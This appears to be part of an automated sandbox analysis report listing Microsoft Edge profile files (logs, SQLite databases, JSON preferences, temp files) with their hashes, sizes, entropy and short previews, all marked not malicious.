SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ac0d1e08-bc82-4754-8ac1-e64fd77a0808.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d65e1cad-7d7b-4f63-b05b-f2221b1a0736.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e9cd7a5d-9f7e-41da-8be8-cbe792619058.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	428
Entropy (8bit):	5.2362532683708745
Encrypted:	false
SSDEEP:	12:lavLZYebvqBZFUt8EHOZ/+EV54ZYebvqBaJ:lglYebvyg8EubHoYebvL
MD5:	D99F914AA54E7D7F5FB36DBC1B4ACAEE
SHA1:	873EBA93C6511B0DE57F65B46AE7B4F9BE82C414
SHA-256:	33530BA643961585F8D9359FACCA24E58270F16BDC001E8982AEC52375730FA5
SHA-512:	886E7A97EE000A43BAE0F4A9134EEFB5A14CBFC8785B1181911B77CCBFD27FE951CED8A598D71060387ECEF0B6E22C834DE2B8CAD530F076CE1916D223569EF6
Malicious:	false
Preview:	2024/11/02-14:52:18.193 1e38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/02-14:52:18.194 1e38 Recovering log #3.2024/11/02-14:52:18.197 1e38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	428
Entropy (8bit):	5.2362532683708745
Encrypted:	false
SSDEEP:	12:lavLZYebvqBZFUt8EHOZ/+EV54ZYebvqBaJ:lglYebvyg8EubHoYebvL
MD5:	D99F914AA54E7D7F5FB36DBC1B4ACAEE
SHA1:	873EBA93C6511B0DE57F65B46AE7B4F9BE82C414
SHA-256:	33530BA643961585F8D9359FACCA24E58270F16BDC001E8982AEC52375730FA5
SHA-512:	886E7A97EE000A43BAE0F4A9134EEFB5A14CBFC8785B1181911B77CCBFD27FE951CED8A598D71060387ECEF0B6E22C834DE2B8CAD530F076CE1916D223569EF6
Malicious:	false
Preview:	2024/11/02-14:52:18.193 1e38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/02-14:52:18.194 1e38 Recovering log #3.2024/11/02-14:52:18.197 1e38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.189859708117918
Encrypted:	false
SSDEEP:	6:HvCNWsN+q2PcNwi23oH+TcwtpIFUt8YvCy8ZZmw+YvCy8NVkwOcNwi23oH+Tcwt7:hsIvLZYebmFUt8//+t54ZYebaUJ
MD5:	C442A52EA746E67068223FDB204C1CC7
SHA1:	7F655FC18E072FBD3D185589627BF586336E584F
SHA-256:	0D70609357C18B001591A20141C4217051EEF1ABCEDFA3715B9EDA2A8C72D779
SHA-512:	61922936BF2AC4969C4D90378EC8A79F5FFAA7A1F77607409C455BBD4212248E0016DA876353A8B628C84B7671798F94BAF444BBB690C869E42E4FA26A4B8F0A
Malicious:	false
Preview:	2024/11/02-14:51:58.405 1318 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/02-14:51:58.410 1318 Recovering log #3.2024/11/02-14:51:58.410 1318 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.189859708117918
Encrypted:	false
SSDEEP:	6:HvCNWsN+q2PcNwi23oH+TcwtpIFUt8YvCy8ZZmw+YvCy8NVkwOcNwi23oH+Tcwt7:hsIvLZYebmFUt8//+t54ZYebaUJ
MD5:	C442A52EA746E67068223FDB204C1CC7
SHA1:	7F655FC18E072FBD3D185589627BF586336E584F
SHA-256:	0D70609357C18B001591A20141C4217051EEF1ABCEDFA3715B9EDA2A8C72D779
SHA-512:	61922936BF2AC4969C4D90378EC8A79F5FFAA7A1F77607409C455BBD4212248E0016DA876353A8B628C84B7671798F94BAF444BBB690C869E42E4FA26A4B8F0A
Malicious:	false
Preview:	2024/11/02-14:51:58.405 1318 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/02-14:51:58.410 1318 Recovering log #3.2024/11/02-14:51:58.410 1318 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2654201644094927
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkMGSAELyKOMq+8HKkjucswRv8p3nVumti:K0q+n0JG9ELyKOMq+8HKkjuczRv89hi
MD5:	792E1A34DABC438C2E17357CABC97201
SHA1:	C0B26DAA4C1055EC080AA2224A8FA62C87269242
SHA-256:	7544F36D11A9E6177E5FCC190AFF6BA3CF62D12D852116D02A0000A03F3794EB
SHA-512:	368109DA7CAF12B4B4EF2BAB789868A8FB21F9D037D75E0FB025F3EAD5C11D41854A9A8816B2022CE6118342BDDF11D727EE00633D1C0B33CBD428525E08234F
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4672836816071326
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0/k:v7doKsKuKZKlZNmu46yjx0M
MD5:	51B746CBD41AE54C6F0A757D3133F8FE
SHA1:	1B195A8234FEC590BACE81D96C021C93345B0577
SHA-256:	9CC2CE22B8E9557FB77C8B8EC88F2DF08BDEE11E5AA5949C7B6DAB0EEFE869DB
SHA-512:	9C638266EF691E59A5A20D5217987BE0D7492BC8C1CB5DD9159AEDA252128FAE04D33D51E5B700AAE5E0BD41AF5E92BFBE63B5AB00D7FD65EB5B1508F45818B9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b7723e30-e19a-484c-ba43-ff8dedca823f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40503
Entropy (8bit):	5.561167062234671
Encrypted:	false
SSDEEP:	768:U0jlmC7pLGLpGsWPWIf1y8F1+UoAYDCx9Tuqh0VfUC9xbog/OVl+w3FVgrwC36Q2:U0jlmacpGsWPWIf1yu1jas+w1VRC36JH
MD5:	88EA9F8787871E5A13535A843F25E840
SHA1:	543F3043235080ED9BBA45530CAF677D992A1A50
SHA-256:	31E39ADEE14ABB329FCA6F07FC9A3FF4553BEFE5729FB23B6A86C7E483CD5F41
SHA-512:	14FD5E90C18DF963E77C1C9DFFB31A90737FE8D1A2545C4C61C4FA4C0E9FD62015AFB8762A9EBA1E0ECDB19CB12C10C3D37FFC5458735A93B97F5ACA34C77CCA
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375047118406045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375047118406045","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ef0787d3-ebea-468c-853a-70ef0e943a1e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.56114658854163
Encrypted:	false
SSDEEP:	768:U0jlmC7pLGLpGsWPWIfuy8F1+UoAYDCx9Tuqh0VfUC9xbog/OVl+w3FVgrwC3bQB:U0jlmacpGsWPWIfuyu1jas+w1VRC3bJU
MD5:	CE055443B0938951BEF6E6D8028D0C33
SHA1:	483025D6188FBA78133CBF6FCC380940F5AC07C3
SHA-256:	EB2B590D7DDA3E66EFB74DEBB07407FBFDF0948C47306675B4C6A9BEAF412113
SHA-512:	8F3F61982F0E11EA5412F92574DAA763147855D7528087A8A99DBB05FA49243154CE292B5F797643EB9F5DB304E09A2CC44E4E9280BA215A4571C80D3334DAB0
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375047118406045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375047118406045","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fa5d607e-df03-4279-af88-3b1458d8e2ee.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ff4f901c-5a51-4031-8d1d-f3677f682c30.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17270), with no line terminators
Category:	dropped
Size (bytes):	17275
Entropy (8bit):	5.481126244598333
Encrypted:	false
SSDEEP:	384:stQSLPGQSu4As8HtJMwY+w8TF9bGNQwVO:sikOXufHzTF9bG+h
MD5:	960B0B8F2BBCF077F621F6426534A464
SHA1:	1B3BC577050A4DA4B112CC4FDAB14352EB8AE11A
SHA-256:	B930BA8C124954359D92FEBCA0563A3E3C53F16DD438859122077D2295358497
SHA-512:	4F9A3F4DBAE32C23555C3816CCC56B50763E178ED4AAC6BD30CA00AF3422C7043708A505119FDB9D0358127BE1620A62D9180024B542E8772DF26ABA3C8990DE
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375047119078832","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.1055395505678137
Encrypted:	false
SSDEEP:	12:Jnt0+Ennt0+EqpEjVl/PnnnnnnnnnnnnvoQtEoxu:Jnt0fnnt0fqoPnnnnnnnnnnnnvHj
MD5:	49C88A19A01774E68F59B192B1018B73
SHA1:	81D844544A8525F03756514D092134F594AD5CC6
SHA-256:	7B1A4A56768E0E7C2AD22C9F246DCAEA313E05B515BB42B3DF9AF56C2B3A1447
SHA-512:	86594FB334966AF2CF62A78DAA1898065F4D2E83508ED731C1481193553B3232F4063263987A42D7231C4B65E04D695B9AAC36EFB81DAA87A2485ABBFBB39D34
Malicious:	false
Preview:	..-.............Q........[.H9.I.3.-.....d<....s...-.............Q........[.H9.I.3.-.....d<....s.........M...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	333752
Entropy (8bit):	0.9323745282511436
Encrypted:	false
SSDEEP:	192:r9ZBTb0JMas5AR4XoaF3pfIoihUftnZ7U++QtLA4hUIMFQzkny8yvcy5y26vQy4p:6r8ChaZ7va4hi+zWy8yvcy5yfQy4xyLA
MD5:	C42D5E11BD9513EE4A6F281596323B6C
SHA1:	1A4C8BA433E5398688B009D86818D298F44D2EF8
SHA-256:	B752C5B6634D0D62DD0F5C1DACF47505758B72591C0073B250A4DAA14F5FA79D
SHA-512:	2234074D45674F8B1A1AB896BDF82C191E7815E1FD26BA5EC275907D29EEEFB9F846C99948DC0E53992F8D22D46AFBD87DC062CA33DB7E262C6443346AA0B48D
Malicious:	false
Preview:	7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	419
Entropy (8bit):	3.686856148695532
Encrypted:	false
SSDEEP:	6:/XntM+dl3sedhOmOuuuuuuuuuuuuAoPsedhOOh:llc8BOuuuuuuuuuuuuAoU8Bh
MD5:	C378BB691CF04D34D2958CF847F3FEF3
SHA1:	E2BD59B426CF944C37EDFBB1C46EDAA0CDEB0333
SHA-256:	0D2C30FAC9818F5F9CE46F7FC3D2BE1E41A8042B2B5531D9EB98C2B6FF1ABC6C
SHA-512:	7B68EBA417DC2220CFD20C24E047C7699E59950FE9610E19B5DC5CF12516600CE30058CA7B9479D36652B1DF6E0CA362461AC2BC9558F0C6D311C07E3C4701D2
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............@..O0................39_config..........6.....n ...1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	327
Entropy (8bit):	5.225957346474883
Encrypted:	false
SSDEEP:	6:Hvmyd3+q2PcNwi23oH+TcwtfrK+IFUt8YvjMXZmw+YvjM3VkwOcNwi23oH+Tcwt5:/dOvLZYeb23FUt8yMX/+yMF54ZYeb3J
MD5:	0A176BF0159A294EF496636F701F1CC1
SHA1:	52FE7FAC79B67A10907B0D8E3A741BE901F9ED4A
SHA-256:	50F90D2E6754DE2369D21603956AE03E1CFF04C5694CBDA13E87428092DEE21F
SHA-512:	A4004FE3F4742CEB04AE43EFD66B61D2EC333FEB8791801F323A1F1F6D9362F237980CA682F4AF6C7F5B2544C53739758BBC910F217DCAF1A6B6E67EEB539185
Malicious:	false
Preview:	2024/11/02-14:51:59.092 e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/02-14:51:59.093 e28 Recovering log #3.2024/11/02-14:51:59.093 e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	327
Entropy (8bit):	5.225957346474883
Encrypted:	false
SSDEEP:	6:Hvmyd3+q2PcNwi23oH+TcwtfrK+IFUt8YvjMXZmw+YvjM3VkwOcNwi23oH+Tcwt5:/dOvLZYeb23FUt8yMX/+yMF54ZYeb3J
MD5:	0A176BF0159A294EF496636F701F1CC1
SHA1:	52FE7FAC79B67A10907B0D8E3A741BE901F9ED4A
SHA-256:	50F90D2E6754DE2369D21603956AE03E1CFF04C5694CBDA13E87428092DEE21F
SHA-512:	A4004FE3F4742CEB04AE43EFD66B61D2EC333FEB8791801F323A1F1F6D9362F237980CA682F4AF6C7F5B2544C53739758BBC910F217DCAF1A6B6E67EEB539185
Malicious:	false
Preview:	2024/11/02-14:51:59.092 e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/02-14:51:59.093 e28 Recovering log #3.2024/11/02-14:51:59.093 e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	782
Entropy (8bit):	4.049291162962452
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
MD5:	FDF465758A7489458B387EB41C7D42B0
SHA1:	9509283CF1BD7397790091C5A7580CBA353A1143
SHA-256:	C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
SHA-512:	9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.230008842823374
Encrypted:	false
SSDEEP:	6:Hvto+q2PcNwi23oH+TcwtfrzAdIFUt8YvtYZmw+YvHNVkwOcNwi23oH+TcwtfrzS:zvLZYeb9FUt8n/+0z54ZYeb2J
MD5:	BE766EDD0006F8350E445F20F071F55A
SHA1:	839395D51ED5981419F491977762BCEAB741334C
SHA-256:	8BF5152C6F94B99ABBD257778A160BCAEB278FF4B6A705F36F767DDE22588410
SHA-512:	664F1509423D5F4C850DEA9D2F2CDB245B02E1E1EF9FF63D1F9708CF5FC804A05034069E830402031EC2B027AA201DF998C1BA1F66ED25C8E5B923FB5D500545
Malicious:	false
